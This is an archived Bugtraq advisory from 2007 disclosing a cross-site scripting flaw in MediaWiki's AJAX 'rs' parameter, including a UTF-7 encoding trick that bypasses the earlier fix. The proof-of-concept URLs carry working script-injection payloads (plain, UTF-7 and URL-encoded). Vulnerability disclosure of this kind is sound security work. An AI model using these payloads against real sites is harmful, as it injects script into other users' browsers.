Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

MediaWiki Cross-site Scripting

From: eyal () BugSec com
Date: 20 Feb 2007 04:29:01 -0000
MediaWiki Cross-site Scripting

Vulnerabilities.


Date:
18/02/2007

Vendor:
MediaWiki

Vulnerable versions:
MediaWiki 1.9.2 (latest) and below.

Description:
MediaWiki v1.8.2 and below are vulnerable to plain Cross-site scripting attack by expliting the experimental AJAX 
features, if enabled (default). This XSS was fixed in post 1.8.2 versions (1.8.3, 1.9.0rc2, 1.9.0, 1.9.1, 1.9.2). This 
fix can be bypassed by encoding the XSS exploit to UTF-7. note: browsers encoding auto-detection has to be enabled for 
successful explitation.


Proof-of-concept:
http://[Host]/wiki/index.php?action=ajax&rs=[XSS]
UTF-7 XSS in post 1.8.2 versions. 

Examples:
v1.8.2 and below:
http://[Host]/wiki/index.php?action=ajax&rs=%3Cscript%3Ewindow.open('http://www.bugsec.com')%3C/script%3E
v1.8.3 - v1.9.2
http://[Host]/wiki/index.php?action=ajax&rs=+ADw-SCRIPT+AD4-window.open('http://www.bugsec.com');+ADw-/SCRIPT+AD4-
http://[Host]/wiki/index.php?action=ajax&rs=%2B%41%44%77%2D%53%43%52%49%50%54%2B%41%44%34%2D%61%6C%65%72%74%28%27%58%53%53%27%29%3B%2B%41%44%77%2D%2F%53%43%52%49%50%54%2B%41%44%34%2D
 (URL Encoded) 


Credit:
Moshe BA from BugSec
Tel:+972-3-9622655
Email: Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
http://www.bugsec.com/articles.php?Security=24
Previous By Date Next
Previous By Thread Next

Current thread: